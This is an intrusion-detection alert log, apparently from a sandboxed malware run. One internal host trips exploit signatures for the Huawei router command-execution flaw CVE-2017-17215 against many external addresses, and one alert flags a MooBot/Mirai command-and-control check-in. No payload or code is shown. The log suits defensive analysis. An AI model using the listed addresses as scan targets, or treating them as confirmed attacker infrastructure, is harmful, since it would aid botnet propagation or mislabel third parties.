                                                    07/10/24-08:26:14.791057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840637215192.168.2.14220.24.58.183
                                                    07/10/24-08:26:22.218998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4509437215192.168.2.14197.199.254.96
                                                    07/10/24-08:26:31.109229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544237215192.168.2.14157.103.181.103
                                                    07/10/24-08:26:57.536379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482837215192.168.2.1441.47.86.218
                                                    07/10/24-08:27:17.047442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562837215192.168.2.14126.227.216.97
                                                    07/10/24-08:27:24.880000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773437215192.168.2.14197.234.202.75
                                                    07/10/24-08:26:14.736595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046237215192.168.2.14157.255.162.175
                                                    07/10/24-08:27:10.625472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001637215192.168.2.14157.245.85.134
                                                    07/10/24-08:27:17.034808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105437215192.168.2.14197.192.237.192
                                                    07/10/24-08:27:30.416774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784637215192.168.2.14157.221.6.160
                                                    07/10/24-08:26:17.989759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402037215192.168.2.14210.220.119.204
                                                    07/10/24-08:26:28.891861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5508837215192.168.2.14174.109.17.162
                                                    07/10/24-08:27:31.561522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843637215192.168.2.1492.83.200.132
                                                    07/10/24-08:26:28.787399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651837215192.168.2.14197.185.236.224
                                                    07/10/24-08:26:43.894192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3323437215192.168.2.1441.218.103.93
                                                    07/10/24-08:26:26.587363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838237215192.168.2.1441.224.57.52
                                                    07/10/24-08:27:32.569954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476237215192.168.2.14126.98.74.165
                                                    07/10/24-08:26:41.428443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5979237215192.168.2.14157.82.201.160
                                                    07/10/24-08:26:18.009286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691437215192.168.2.14161.131.69.187
                                                    07/10/24-08:26:25.518059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966837215192.168.2.14157.170.168.181
                                                    07/10/24-08:27:20.466176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899237215192.168.2.1441.170.203.43
                                                    07/10/24-08:26:11.600235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314437215192.168.2.14157.107.162.53
                                                    07/10/24-08:26:52.070871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6009837215192.168.2.14157.171.98.184
                                                    07/10/24-08:26:55.407973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959837215192.168.2.14157.172.224.163
                                                    07/10/24-08:27:03.040763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946037215192.168.2.14197.18.225.114
                                                    07/10/24-08:27:05.220771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082637215192.168.2.14197.23.132.3
                                                    07/10/24-08:26:31.099427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904837215192.168.2.14157.211.44.125
                                                    07/10/24-08:26:51.986652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017837215192.168.2.14204.78.1.185
                                                    07/10/24-08:27:21.455167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239637215192.168.2.1441.244.79.203
                                                    07/10/24-08:27:19.151006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4880237215192.168.2.1452.207.58.94
                                                    07/10/24-08:26:49.837890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510837215192.168.2.1441.174.118.166
                                                    07/10/24-08:27:08.339309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5962437215192.168.2.14197.228.211.226
                                                    07/10/24-08:27:33.948971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510037215192.168.2.14157.102.235.120
                                                    07/10/24-08:26:38.641903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4350637215192.168.2.14197.52.32.75
                                                    07/10/24-08:26:47.869389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452037215192.168.2.1441.179.245.32
                                                    07/10/24-08:26:31.048533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153037215192.168.2.14157.247.223.81
                                                    07/10/24-08:26:31.046147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990037215192.168.2.14157.152.209.194
                                                    07/10/24-08:26:33.182534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958237215192.168.2.14197.81.120.131
                                                    07/10/24-08:26:57.650241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931637215192.168.2.1441.69.184.97
                                                    07/10/24-08:26:15.857451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531837215192.168.2.14197.122.2.35
                                                    07/10/24-08:26:43.925849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047037215192.168.2.14157.37.79.181
                                                    07/10/24-08:27:23.917453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268837215192.168.2.1441.184.165.239
                                                    07/10/24-08:26:34.202638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4559837215192.168.2.14197.95.15.255
                                                    07/10/24-08:26:55.428657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381837215192.168.2.14197.159.26.190
                                                    07/10/24-08:27:05.128413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339437215192.168.2.14197.53.25.49
                                                    07/10/24-08:26:42.394014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342237215192.168.2.14197.206.228.238
                                                    07/10/24-08:27:02.876931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641837215192.168.2.1441.109.113.4
                                                    07/10/24-08:27:03.004303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4067037215192.168.2.14197.196.150.45
                                                    07/10/24-08:26:28.896457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874837215192.168.2.14197.244.24.64
                                                    07/10/24-08:26:31.099598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800037215192.168.2.14188.79.36.56
                                                    07/10/24-08:26:14.828037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815037215192.168.2.14182.177.88.28
                                                    07/10/24-08:26:45.633588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672837215192.168.2.14157.198.26.20
                                                    07/10/24-08:26:59.683298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053837215192.168.2.14123.102.128.57
                                                    07/10/24-08:27:14.002170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721637215192.168.2.1441.10.197.81
                                                    07/10/24-08:27:34.122738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646637215192.168.2.14157.129.190.240
                                                    07/10/24-08:27:24.937282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5225637215192.168.2.14201.244.144.48
                                                    07/10/24-08:27:31.489680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430037215192.168.2.14197.86.68.81
                                                    07/10/24-08:26:11.663156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714637215192.168.2.14197.172.12.130
                                                    07/10/24-08:26:49.798934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398237215192.168.2.1487.144.114.174
                                                    07/10/24-08:27:28.101557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5580837215192.168.2.1441.66.246.48
                                                    07/10/24-08:27:27.133887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304037215192.168.2.1492.88.158.225
                                                    07/10/24-08:27:28.115496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4928437215192.168.2.14126.241.144.116
                                                    07/10/24-08:27:33.922247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457837215192.168.2.14157.166.216.250
                                                    07/10/24-08:26:31.090625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4923037215192.168.2.14157.88.252.172
                                                    07/10/24-08:26:55.437797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247837215192.168.2.14197.203.103.99
                                                    07/10/24-08:26:28.693034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529637215192.168.2.1441.32.68.125
                                                    07/10/24-08:27:10.739922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941637215192.168.2.14198.150.199.107
                                                    07/10/24-08:26:13.819376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734437215192.168.2.1441.122.83.60
                                                    07/10/24-08:27:31.538711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738837215192.168.2.14197.177.60.213
                                                    07/10/24-08:26:38.547817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808437215192.168.2.14157.142.37.179
                                                    07/10/24-08:26:28.684788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770237215192.168.2.1441.223.248.86
                                                    07/10/24-08:26:25.508243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5268637215192.168.2.14157.220.229.56
                                                    07/10/24-08:26:57.551648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579437215192.168.2.14157.50.206.18
                                                    07/10/24-08:26:49.854683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5670037215192.168.2.14197.196.109.27
                                                    07/10/24-08:26:13.805293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654037215192.168.2.14197.62.133.159
                                                    07/10/24-08:26:45.632030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4950837215192.168.2.14157.83.249.195
                                                    07/10/24-08:26:47.949660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985037215192.168.2.14197.241.38.137
                                                    07/10/24-08:26:23.348591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536237215192.168.2.14197.169.149.6
                                                    07/10/24-08:26:26.527286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565837215192.168.2.1435.150.194.19
                                                    07/10/24-08:26:11.624082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064437215192.168.2.1441.100.17.22
                                                    07/10/24-08:26:51.988171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859437215192.168.2.1462.84.40.51
                                                    07/10/24-08:26:36.341806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525637215192.168.2.14157.22.177.49
                                                    07/10/24-08:26:59.524945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4871237215192.168.2.14157.67.242.46
                                                    07/10/24-08:27:32.563593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137037215192.168.2.14119.138.125.189
                                                    07/10/24-08:26:22.282645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845637215192.168.2.1441.149.133.240
                                                    07/10/24-08:27:16.998730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693237215192.168.2.14197.81.115.112
                                                    07/10/24-08:26:13.700546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291037215192.168.2.14174.33.110.226
                                                    07/10/24-08:26:52.013790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992237215192.168.2.14157.89.140.82
                                                    07/10/24-08:26:17.954473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740037215192.168.2.14157.107.136.98
                                                    07/10/24-08:27:34.118547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5898637215192.168.2.1490.91.222.205
                                                    07/10/24-08:26:11.162688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534637215192.168.2.14197.202.196.183
                                                    07/10/24-08:27:17.087828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3665637215192.168.2.1441.29.202.237
                                                    07/10/24-08:26:43.714362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437037215192.168.2.14157.233.13.51
                                                    07/10/24-08:26:14.815685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809837215192.168.2.14197.175.137.135
                                                    07/10/24-08:26:53.163403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852437215192.168.2.14157.160.106.26
                                                    07/10/24-08:27:20.412517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300037215192.168.2.14129.198.179.85
                                                    07/10/24-08:26:49.900161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715037215192.168.2.1441.6.120.105
                                                    07/10/24-08:27:28.070223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893037215192.168.2.14129.51.178.1
                                                    07/10/24-08:26:28.686336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108837215192.168.2.1441.230.95.228
                                                    07/10/24-08:26:55.343631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479437215192.168.2.14135.146.210.228
                                                    07/10/24-08:26:59.631449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3459037215192.168.2.1441.68.226.32
                                                    07/10/24-08:27:07.310052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401237215192.168.2.1441.197.6.192
                                                    07/10/24-08:26:53.134905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474437215192.168.2.14209.242.71.38
                                                    07/10/24-08:27:02.878785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765637215192.168.2.1441.193.27.214
                                                    07/10/24-08:27:13.996170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801437215192.168.2.14197.227.21.132
                                                    07/10/24-08:26:34.255856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5393037215192.168.2.14157.26.156.254
                                                    07/10/24-08:27:07.270809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805037215192.168.2.1441.72.60.225
                                                    07/10/24-08:26:28.843538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469037215192.168.2.1441.211.49.77
                                                    07/10/24-08:27:13.800580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3360237215192.168.2.14157.154.225.97
                                                    07/10/24-08:27:05.206516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693037215192.168.2.1441.44.206.53
                                                    07/10/24-08:26:23.308313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675237215192.168.2.1441.3.54.10
                                                    07/10/24-08:27:03.040763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698437215192.168.2.1491.183.90.183
                                                    07/10/24-08:26:55.380846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024837215192.168.2.14113.156.69.94
                                                    07/10/24-08:27:17.034807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267237215192.168.2.14157.205.171.205
                                                    07/10/24-08:27:27.070313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290637215192.168.2.14157.37.53.144
                                                    07/10/24-08:27:34.275264TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)393325976192.168.2.1451.79.141.54
                                                    07/10/24-08:26:13.812708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600637215192.168.2.14197.178.173.188
                                                    07/10/24-08:27:10.632991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325237215192.168.2.14157.171.214.197
                                                    07/10/24-08:26:43.864368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436237215192.168.2.14197.100.137.117
                                                    07/10/24-08:26:36.411505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899037215192.168.2.14197.167.23.230
                                                    07/10/24-08:27:13.833354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874237215192.168.2.14157.33.185.50
                                                    07/10/24-08:26:15.865384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106237215192.168.2.14197.195.191.225
                                                    07/10/24-08:26:34.244289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4548237215192.168.2.14157.17.181.191
                                                    07/10/24-08:26:49.801856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234437215192.168.2.14220.122.85.125
                                                    07/10/24-08:26:25.507737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3888437215192.168.2.14132.62.185.196
                                                    07/10/24-08:27:11.612567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4058237215192.168.2.141.8.163.224
                                                    07/10/24-08:27:28.064051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451037215192.168.2.14157.223.44.198
                                                    07/10/24-08:26:25.430533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327037215192.168.2.1441.187.94.137
                                                    07/10/24-08:27:23.962913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029437215192.168.2.14157.164.192.40
                                                    07/10/24-08:26:26.596557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622637215192.168.2.14157.74.199.250
                                                    07/10/24-08:26:49.850247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949637215192.168.2.14157.31.192.167
                                                    07/10/24-08:27:17.061013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284037215192.168.2.1441.151.231.152
                                                    07/10/24-08:26:17.974757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953237215192.168.2.1441.24.149.100
                                                    07/10/24-08:26:41.426322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178237215192.168.2.14197.176.95.63
                                                    07/10/24-08:26:49.850872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453237215192.168.2.1441.98.200.121
                                                    07/10/24-08:27:30.492988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5288837215192.168.2.14135.75.198.53
                                                    07/10/24-08:27:13.859326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598037215192.168.2.14157.41.51.236
                                                    07/10/24-08:27:14.810492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685637215192.168.2.1441.171.49.87
                                                    07/10/24-08:27:24.997757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5218837215192.168.2.14204.197.141.222
                                                    07/10/24-08:27:28.082444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112437215192.168.2.1441.66.17.12
                                                    07/10/24-08:26:13.829838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866037215192.168.2.14197.26.192.254
                                                    07/10/24-08:26:29.860241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756037215192.168.2.1441.155.140.105
                                                    07/10/24-08:27:08.367822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126437215192.168.2.14197.75.22.156
                                                    07/10/24-08:27:33.875122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4008637215192.168.2.1458.33.4.231
                                                    07/10/24-08:26:33.171308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110237215192.168.2.1441.194.228.186
                                                    07/10/24-08:27:34.119978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316637215192.168.2.1441.54.212.173
                                                    07/10/24-08:26:14.622208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940037215192.168.2.14157.189.125.7
                                                    07/10/24-08:27:13.930927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551837215192.168.2.14197.136.164.136
                                                    07/10/24-08:26:25.466944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038837215192.168.2.1460.184.165.166
                                                    07/10/24-08:26:57.647233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529037215192.168.2.1441.173.194.181
                                                    07/10/24-08:26:57.646782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064637215192.168.2.14157.6.111.209
                                                    07/10/24-08:27:24.976996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984237215192.168.2.1441.118.203.44
                                                    07/10/24-08:26:20.153663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960437215192.168.2.1412.193.176.19
                                                    07/10/24-08:26:33.254511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283237215192.168.2.1441.141.141.101
                                                    07/10/24-08:26:36.323441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967837215192.168.2.14197.248.241.221
                                                    07/10/24-08:26:36.348992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3352037215192.168.2.1441.97.37.43
                                                    07/10/24-08:27:20.436388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852637215192.168.2.14157.157.61.208
                                                    07/10/24-08:27:08.373909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4078237215192.168.2.14197.20.23.75
                                                    07/10/24-08:27:10.647678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152037215192.168.2.14197.184.186.91
                                                    07/10/24-08:27:20.520093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4711837215192.168.2.14106.215.166.215
                                                    07/10/24-08:27:32.623300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458237215192.168.2.14157.59.32.84
                                                    07/10/24-08:26:15.871447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828837215192.168.2.14197.95.172.111
                                                    07/10/24-08:27:28.101557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727237215192.168.2.14197.183.140.37
                                                    07/10/24-08:26:13.663247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191037215192.168.2.14197.144.119.38
                                                    07/10/24-08:26:22.211996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289237215192.168.2.14157.90.205.228
                                                    07/10/24-08:27:14.807456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746237215192.168.2.14157.48.238.227
                                                    07/10/24-08:27:02.683059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5535837215192.168.2.14202.148.70.100
                                                    07/10/24-08:27:31.463374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5616637215192.168.2.1441.138.138.22
                                                    07/10/24-08:27:32.583920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743437215192.168.2.1441.163.48.182
                                                    07/10/24-08:26:17.974548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440237215192.168.2.14197.239.38.137
                                                    07/10/24-08:27:32.489604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670237215192.168.2.1441.14.11.75
                                                    07/10/24-08:26:34.267264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344437215192.168.2.14157.93.39.24
                                                    07/10/24-08:26:43.894192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424837215192.168.2.14197.76.19.108
                                                    07/10/24-08:27:27.151855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434637215192.168.2.14197.60.140.171
                                                    07/10/24-08:27:23.957174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3952037215192.168.2.14157.4.220.197
                                                    07/10/24-08:26:43.913134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419037215192.168.2.14197.219.133.116
                                                    07/10/24-08:27:22.564607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921237215192.168.2.1463.125.125.45
                                                    07/10/24-08:27:33.962106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975637215192.168.2.14197.247.125.211
                                                    07/10/24-08:26:36.326786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028037215192.168.2.1441.116.131.197
                                                    07/10/24-08:26:41.309274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3508237215192.168.2.14157.224.105.96
                                                    07/10/24-08:27:17.103998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3415437215192.168.2.14140.173.171.218
                                                    07/10/24-08:26:26.614588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295437215192.168.2.1441.180.45.142
                                                    07/10/24-08:26:59.633265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272837215192.168.2.1441.113.235.71
                                                    07/10/24-08:26:59.795467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5490037215192.168.2.14137.231.196.69
                                                    07/10/24-08:26:20.133795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717237215192.168.2.1441.235.112.219
                                                    07/10/24-08:26:59.657792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034037215192.168.2.14197.203.191.135
